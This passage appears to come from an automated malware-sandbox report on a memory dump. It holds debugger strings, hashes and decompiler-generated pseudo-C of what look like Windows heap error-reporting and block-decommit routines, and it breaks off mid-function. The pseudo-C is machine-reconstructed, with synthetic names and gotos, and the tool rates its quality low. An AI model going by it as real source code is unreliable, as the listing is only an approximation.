                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A0B38F
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A0B47D
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A0B3D6
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A0B53F
                                          • *** enter .cxr %p for the context, xrefs: 01A0B50D
                                          • The resource is owned shared by %d threads, xrefs: 01A0B37E
                                          • Go determine why that thread has not released the critical section., xrefs: 01A0B3C5
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A0B314
                                          • an invalid address, %p, xrefs: 01A0B4CF
                                          • write to, xrefs: 01A0B4A6
                                          • This failed because of error %Ix., xrefs: 01A0B446
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A0B476
                                          • a NULL pointer, xrefs: 01A0B4E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: 962e02bf77884dcfb28e30ae9bfa5147565c3cc496418e5620fa52156ad5af10
                                          • Instruction ID: 8097b69b673b14b79b4039c0a7b617a8b29891aa5115c0aa032f853c7be79901
                                          • Opcode Fuzzy Hash: 962e02bf77884dcfb28e30ae9bfa5147565c3cc496418e5620fa52156ad5af10
                                          • Instruction Fuzzy Hash: B481367DA80200FFEB235B4AED49D6B3BB5EFAAB55F460088F50C1B192D3628511C672
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E01A11C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0x19348a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0x1a4589c);
                                          				E0195B150("Heap error detected at %p (heap handle %p)\n",  *0x1a458a0);
                                          				_t27 =  *0x1a45898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01A11E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E0195B150("Error code: %d - %s\n",  *0x1a45898);
                                          				_t113 =  *0x1a458a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter1: %p\n",  *0x1a458a4);
                                          				}
                                          				_t115 =  *0x1a458a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter2: %p\n",  *0x1a458a8);
                                          				}
                                          				_t117 =  *0x1a458ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Parameter3: %p\n",  *0x1a458ac);
                                          				}
                                          				_t119 =  *0x1a458b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0x1a458b4);
                                          					E0195B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a458b0);
                                          				} else {
                                          					_t120 =  *0x1a458b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E0195B150();
                                          				} else {
                                          					E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E0195B150("Stack trace available at %p\n", 0x1a458c0);
                                          			}











                                          0x01a11c10
                                          0x01a11c16
                                          0x01a11c1e
                                          0x01a11c3d
                                          0x01a11c3e
                                          0x01a11c20
                                          0x01a11c35
                                          0x01a11c3a
                                          0x01a11c44
                                          0x01a11c55
                                          0x01a11c5a
                                          0x01a11c65
                                          0x01a11c67
                                          0x00000000
                                          0x01a11c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01a11c67
                                          0x01a11cdc
                                          0x01a11ce5
                                          0x01a11d04
                                          0x01a11d05
                                          0x01a11ce7
                                          0x01a11cfc
                                          0x01a11d01
                                          0x01a11d0b
                                          0x01a11d17
                                          0x01a11d1f
                                          0x01a11d25
                                          0x01a11d30
                                          0x01a11d4f
                                          0x01a11d50
                                          0x01a11d32
                                          0x01a11d47
                                          0x01a11d4c
                                          0x01a11d61
                                          0x01a11d67
                                          0x01a11d68
                                          0x01a11d6e
                                          0x01a11d79
                                          0x01a11d98
                                          0x01a11d99
                                          0x01a11d7b
                                          0x01a11d90
                                          0x01a11d95
                                          0x01a11daa
                                          0x01a11db0
                                          0x01a11db1
                                          0x01a11db7
                                          0x01a11dc2
                                          0x01a11de1
                                          0x01a11de2
                                          0x01a11dc4
                                          0x01a11dd9
                                          0x01a11dde
                                          0x01a11df3
                                          0x01a11df9
                                          0x01a11dfa
                                          0x01a11e00
                                          0x01a11e0a
                                          0x01a11e13
                                          0x01a11e32
                                          0x01a11e33
                                          0x01a11e15
                                          0x01a11e2a
                                          0x01a11e2f
                                          0x01a11e39
                                          0x01a11e4a
                                          0x01a11e02
                                          0x01a11e02
                                          0x01a11e08
                                          0x00000000
                                          0x00000000
                                          0x01a11e08
                                          0x01a11e5b
                                          0x01a11e7a
                                          0x01a11e7b
                                          0x01a11e5d
                                          0x01a11e72
                                          0x01a11e77
                                          0x01a11e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 727ba0940d3afea9113c1b46cd62a02a86d3fb87c59ea1b56344e17ed74f0271
                                          • Instruction ID: e2a1efdf3ac6de9d54240d501b6c811be63eab7a40886112d9f3e849bf1e6a2d
                                          • Opcode Fuzzy Hash: 727ba0940d3afea9113c1b46cd62a02a86d3fb87c59ea1b56344e17ed74f0271
                                          • Instruction Fuzzy Hash: FA61E53A911245DFD792EBB9D484D30B3F5FB84930B0D806EFA0E6B745D6689C418F4A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E0197A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                          				char _v8;
                                          				signed short _v12;
                                          				signed short _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				unsigned int _v52;
                                          				signed int _v56;
                                          				void* _v60;
                                          				intOrPtr _v64;
                                          				void* _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				unsigned int _t246;
                                          				signed char _t247;
                                          				signed short _t249;
                                          				unsigned int _t256;
                                          				signed int _t262;
                                          				signed int _t265;
                                          				signed int _t266;
                                          				signed int _t267;
                                          				intOrPtr _t270;
                                          				signed int _t280;
                                          				signed int _t286;
                                          				signed int _t289;
                                          				intOrPtr _t290;
                                          				signed int _t291;
                                          				signed int _t317;
                                          				signed short _t320;
                                          				intOrPtr _t327;
                                          				signed int _t339;
                                          				signed int _t344;
                                          				signed int _t347;
                                          				intOrPtr _t348;
                                          				signed int _t350;
                                          				signed int _t352;
                                          				signed int _t353;
                                          				signed int _t356;
                                          				intOrPtr _t357;
                                          				intOrPtr _t366;
                                          				signed int _t367;
                                          				signed int _t370;
                                          				intOrPtr _t371;
                                          				signed int _t372;
                                          				signed int _t394;
                                          				signed short _t402;
                                          				intOrPtr _t404;
                                          				intOrPtr _t415;
                                          				signed int _t430;
                                          				signed int _t433;
                                          				signed int _t437;
                                          				signed int _t445;
                                          				signed short _t446;
                                          				signed short _t449;
                                          				signed short _t452;
                                          				signed int _t455;
                                          				signed int _t460;
                                          				signed short* _t468;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				signed int _t483;
                                          				intOrPtr _t484;
                                          				signed int _t491;
                                          				unsigned int _t506;
                                          				unsigned int _t508;
                                          				signed int _t513;
                                          				signed int _t514;
                                          				signed int _t521;
                                          				signed short* _t533;
                                          				signed int _t541;
                                          				signed int _t543;
                                          				signed int _t546;
                                          				unsigned int _t551;
                                          				signed int _t553;
                                          
                                          				_t450 = __ecx;
                                          				_t553 = __ecx;
                                          				_t539 = __edx;
                                          				_v28 = 0;
                                          				_v40 = 0;
                                          				if(( *(__ecx + 0xcc) ^  *0x1a48a68) != 0) {
                                          					_push(_a4);
                                          					_t513 = __edx;
                                          					L11:
                                          					_t246 = E0197A830(_t450, _t513);
                                          					L7:
                                          					return _t246;
                                          				}
                                          				if(_a8 != 0) {
                                          					__eflags =  *(__edx + 2) & 0x00000008;
                                          					if(( *(__edx + 2) & 0x00000008) != 0) {
                                          						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                          						_t430 = E0197DF24(__edx,  &_v12,  &_v16);
                                          						__eflags = _t430;
                                          						if(_t430 != 0) {
                                          							_t157 = _t553 + 0x234;
                                          							 *_t157 =  *(_t553 + 0x234) - _v16;
                                          							__eflags =  *_t157;
                                          						}
                                          					}
                                          					_t445 = _a4;
                                          					_t514 = _t539;
                                          					_v48 = _t539;
                                          					L14:
                                          					_t247 =  *((intOrPtr*)(_t539 + 6));
                                          					__eflags = _t247;
                                          					if(_t247 == 0) {
                                          						_t541 = _t553;
                                          					} else {
                                          						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                          						__eflags = _t541;
                                          					}
                                          					_t249 = 7 + _t445 * 8 + _t514;
                                          					_v12 = _t249;
                                          					__eflags =  *_t249 - 3;
                                          					if( *_t249 == 3) {
                                          						_v16 = _t514 + _t445 * 8 + 8;
                                          						E01959373(_t553, _t514 + _t445 * 8 + 8);
                                          						_t452 = _v16;
                                          						_v28 =  *(_t452 + 0x10);
                                          						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                          						_v36 =  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                          						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                          						_t256 =  *(_t452 + 0x14);
                                          						__eflags = _t256 - 0x7f000;
                                          						if(_t256 >= 0x7f000) {
                                          							_t142 = _t553 + 0x1ec;
                                          							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                          							__eflags =  *_t142;
                                          							_t256 =  *(_t452 + 0x14);
                                          						}
                                          						_t513 = _v48;
                                          						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                          						_a4 = _t445;
                                          						_v40 = 1;
                                          					} else {
                                          						_t27 =  &_v36;
                                          						 *_t27 = _v36 & 0x00000000;
                                          						__eflags =  *_t27;
                                          					}
                                          					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                          					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                          						_v44 = _t513;
                                          						_t262 = E0195A9EF(_t541, _t513);
                                          						__eflags = _a8;
                                          						_v32 = _t262;
                                          						if(_a8 != 0) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								goto L19;
                                          							}
                                          						}
                                          						__eflags =  *0x1a48748 - 1;
                                          						if( *0x1a48748 >= 1) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								_t415 =  *[fs:0x30];
                                          								__eflags =  *(_t415 + 0xc);
                                          								if( *(_t415 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E0195B150();
                                          								} else {
                                          									E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push("(UCRBlock != NULL)");
                                          								E0195B150();
                                          								__eflags =  *0x1a47bc8;
                                          								if( *0x1a47bc8 == 0) {
                                          									__eflags = 1;
                                          									E01A12073(_t445, 1, _t541, 1);
                                          								}
                                          								_t513 = _v48;
                                          								_t445 = _a4;
                                          							}
                                          						}
                                          						_t350 = _v40;
                                          						_t480 = _t445 << 3;
                                          						_v20 = _t480;
                                          						_t481 = _t480 + _t513;
                                          						_v24 = _t481;
                                          						__eflags = _t350;
                                          						if(_t350 == 0) {
                                          							_t481 = _t481 + 0xfffffff0;
                                          							__eflags = _t481;
                                          						}
                                          						_t483 = (_t481 & 0xfffff000) - _v44;
                                          						__eflags = _t483;
                                          						_v52 = _t483;
                                          						if(_t483 == 0) {
                                          							__eflags =  *0x1a48748 - 1;
                                          							if( *0x1a48748 < 1) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t350;
                                          							goto L146;
                                          						} else {
                                          							_t352 = E0198174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t352;
                                          							if(_t352 < 0) {
                                          								goto L94;
                                          							}
                                          							_t353 = E01977D50();
                                          							_t447 = 0x7ffe0380;
                                          							__eflags = _t353;
                                          							if(_t353 != 0) {
                                          								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t356 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t356;
                                          							if( *_t356 != 0) {
                                          								_t357 =  *[fs:0x30];
                                          								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                          								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                          									E01A114FB(_t447, _t553, _v44, _v52, 5);
                                          								}
                                          							}
                                          							_t358 = _v32;
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t484 - 0x7f000;
                                          							if(_t484 >= 0x7f000) {
                                          								_t90 = _t553 + 0x1ec;
                                          								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                          								__eflags =  *_t90;
                                          							}
                                          							E01959373(_t553, _t358);
                                          							_t486 = _v32;
                                          							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                          							E01959819(_t486);
                                          							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                          							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                          							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t366 - 0x7f000;
                                          							if(_t366 >= 0x7f000) {
                                          								_t104 = _t553 + 0x1ec;
                                          								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                          								__eflags =  *_t104;
                                          							}
                                          							__eflags = _v40;
                                          							if(_v40 == 0) {
                                          								_t533 = _v52 + _v44;
                                          								_v32 = _t533;
                                          								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          								__eflags = _v24 - _v52 + _v44;
                                          								if(_v24 == _v52 + _v44) {
                                          									__eflags =  *(_t553 + 0x4c);
                                          									if( *(_t553 + 0x4c) != 0) {
                                          										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                          										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                          									}
                                          								} else {
                                          									_t449 = 0;
                                          									_t533[3] = 0;
                                          									_t533[1] = 0;
                                          									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                          									_t491 = _t394;
                                          									 *_t533 = _t394;
                                          									__eflags =  *0x1a48748 - 1; // 0x0
                                          									if(__eflags >= 0) {
                                          										__eflags = _t491 - 1;
                                          										if(_t491 <= 1) {
                                          											_t404 =  *[fs:0x30];
                                          											__eflags =  *(_t404 + 0xc);
                                          											if( *(_t404 + 0xc) == 0) {
                                          												_push("HEAP: ");
                                          												E0195B150();
                                          											} else {
                                          												E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          											}
                                          											_push("((LONG)FreeEntry->Size > 1)");
                                          											E0195B150();
                                          											_pop(_t491);
                                          											__eflags =  *0x1a47bc8 - _t449; // 0x0
                                          											if(__eflags == 0) {
                                          												__eflags = 0;
                                          												_t491 = 1;
                                          												E01A12073(_t449, 1, _t541, 0);
                                          											}
                                          											_t533 = _v32;
                                          										}
                                          									}
                                          									_t533[1] = _t449;
                                          									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                          										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                          										_v16 = _t402;
                                          										__eflags = _t402 - 0xfe;
                                          										if(_t402 >= 0xfe) {
                                          											_push(_t491);
                                          											_push(_t449);
                                          											E01A1A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                          											_t533 = _v48;
                                          											_t402 = _v32;
                                          										}
                                          										_t449 = _t402;
                                          									}
                                          									_t533[3] = _t449;
                                          									E0197A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                          									_t447 = 0x7ffe0380;
                                          								}
                                          							}
                                          							_t367 = E01977D50();
                                          							__eflags = _t367;
                                          							if(_t367 != 0) {
                                          								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t370 = _t447;
                                          							}
                                          							__eflags =  *_t370;
                                          							if( *_t370 != 0) {
                                          								_t371 =  *[fs:0x30];
                                          								__eflags =  *(_t371 + 0x240) & 1;
                                          								if(( *(_t371 + 0x240) & 1) != 0) {
                                          									__eflags = E01977D50();
                                          									if(__eflags != 0) {
                                          										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          									}
                                          									E01A11411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                          								}
                                          							}
                                          							_t372 = E01977D50();
                                          							_t546 = 0x7ffe038a;
                                          							_t446 = 0x230;
                                          							__eflags = _t372;
                                          							if(_t372 != 0) {
                                          								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          							} else {
                                          								_t246 = 0x7ffe038a;
                                          							}
                                          							__eflags =  *_t246;
                                          							if( *_t246 == 0) {
                                          								goto L7;
                                          							} else {
                                          								__eflags = E01977D50();
                                          								if(__eflags != 0) {
                                          									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                          									__eflags = _t546;
                                          								}
                                          								_push( *_t546 & 0x000000ff);
                                          								_push(_v36);
                                          								_push(_v40);
                                          								goto L120;
                                          							}
                                          						}
                                          					} else {
                                          						L19:
                                          						_t31 = _t513 + 0x101f; // 0x101f
                                          						_t455 = _t31 & 0xfffff000;
                                          						_t32 = _t513 + 0x28; // 0x28
                                          						_v44 = _t455;
                                          						__eflags = _t455 - _t32;
                                          						if(_t455 == _t32) {
                                          							_t455 = _t455 + 0x1000;
                                          							_v44 = _t455;
                                          						}
                                          						_t265 = _t445 << 3;
                                          						_v24 = _t265;
                                          						_t266 = _t265 + _t513;
                                          						__eflags = _v40;
                                          						_v20 = _t266;
                                          						if(_v40 == 0) {
                                          							_t266 = _t266 + 0xfffffff0;
                                          							__eflags = _t266;
                                          						}
                                          						_t267 = _t266 & 0xfffff000;
                                          						_v52 = _t267;
                                          						__eflags = _t267 - _t455;
                                          						if(_t267 < _t455) {
                                          							__eflags =  *0x1a48748 - 1; // 0x0
                                          							if(__eflags < 0) {
                                          								L9:
                                          								_t450 = _t553;
                                          								L10:
                                          								_push(_t445);
                                          								goto L11;
                                          							}
                                          							__eflags = _v40;
                                          							L146:
                                          							if(__eflags == 0) {
                                          								goto L9;
                                          							}
                                          							_t270 =  *[fs:0x30];
                                          							__eflags =  *(_t270 + 0xc);
                                          							if( *(_t270 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E0195B150();
                                          							} else {
                                          								E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("(!TrailingUCR)");
                                          							E0195B150();
                                          							__eflags =  *0x1a47bc8;
                                          							if( *0x1a47bc8 == 0) {
                                          								__eflags = 0;
                                          								E01A12073(_t445, 1, _t541, 0);
                                          							}
                                          							L152:
                                          							_t445 = _a4;
                                          							L153:
                                          							_t513 = _v48;
                                          							goto L9;
                                          						}
                                          						_v32 = _t267;
                                          						_t280 = _t267 - _t455;
                                          						_v32 = _v32 - _t455;
                                          						__eflags = _a8;
                                          						_t460 = _v32;
                                          						_v52 = _t460;
                                          						if(_a8 != 0) {
                                          							L27:
                                          							__eflags = _t280;
                                          							if(_t280 == 0) {
                                          								L33:
                                          								_t446 = 0;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									_t468 = _v44 + _v52;
                                          									_v36 = _t468;
                                          									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          									__eflags = _v20 - _v52 + _v44;
                                          									if(_v20 == _v52 + _v44) {
                                          										__eflags =  *(_t553 + 0x4c);
                                          										if( *(_t553 + 0x4c) != 0) {
                                          											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                          											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                          										}
                                          									} else {
                                          										_t468[3] = 0;
                                          										_t468[1] = 0;
                                          										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                          										_t521 = _t317;
                                          										 *_t468 = _t317;
                                          										__eflags =  *0x1a48748 - 1; // 0x0
                                          										if(__eflags >= 0) {
                                          											__eflags = _t521 - 1;
                                          											if(_t521 <= 1) {
                                          												_t327 =  *[fs:0x30];
                                          												__eflags =  *(_t327 + 0xc);
                                          												if( *(_t327 + 0xc) == 0) {
                                          													_push("HEAP: ");
                                          													E0195B150();
                                          												} else {
                                          													E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          												}
                                          												_push("(LONG)FreeEntry->Size > 1");
                                          												E0195B150();
                                          												__eflags =  *0x1a47bc8 - _t446; // 0x0
                                          												if(__eflags == 0) {
                                          													__eflags = 1;
                                          													E01A12073(_t446, 1, _t541, 1);
                                          												}
                                          												_t468 = _v36;
                                          											}
                                          										}
                                          										_t468[1] = _t446;
                                          										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                          										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                          											_t320 = _t446;
                                          										} else {
                                          											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                          											_v12 = _t320;
                                          											__eflags = _t320 - 0xfe;
                                          											if(_t320 >= 0xfe) {
                                          												_push(_t468);
                                          												_push(_t446);
                                          												E01A1A80D(_t522, 3, _t468, _t541);
                                          												_t468 = _v52;
                                          												_t320 = _v28;
                                          											}
                                          										}
                                          										_t468[3] = _t320;
                                          										E0197A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                          									}
                                          								}
                                          								E0197B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                          								E0197A830(_t553, _v64, _v24);
                                          								_t286 = E01977D50();
                                          								_t542 = 0x7ffe0380;
                                          								__eflags = _t286;
                                          								if(_t286 != 0) {
                                          									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								} else {
                                          									_t289 = 0x7ffe0380;
                                          								}
                                          								__eflags =  *_t289;
                                          								if( *_t289 != 0) {
                                          									_t290 =  *[fs:0x30];
                                          									__eflags =  *(_t290 + 0x240) & 1;
                                          									if(( *(_t290 + 0x240) & 1) != 0) {
                                          										__eflags = E01977D50();
                                          										if(__eflags != 0) {
                                          											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										}
                                          										E01A11411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                          									}
                                          								}
                                          								_t291 = E01977D50();
                                          								_t543 = 0x7ffe038a;
                                          								__eflags = _t291;
                                          								if(_t291 != 0) {
                                          									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          								} else {
                                          									_t246 = 0x7ffe038a;
                                          								}
                                          								__eflags =  *_t246;
                                          								if( *_t246 != 0) {
                                          									__eflags = E01977D50();
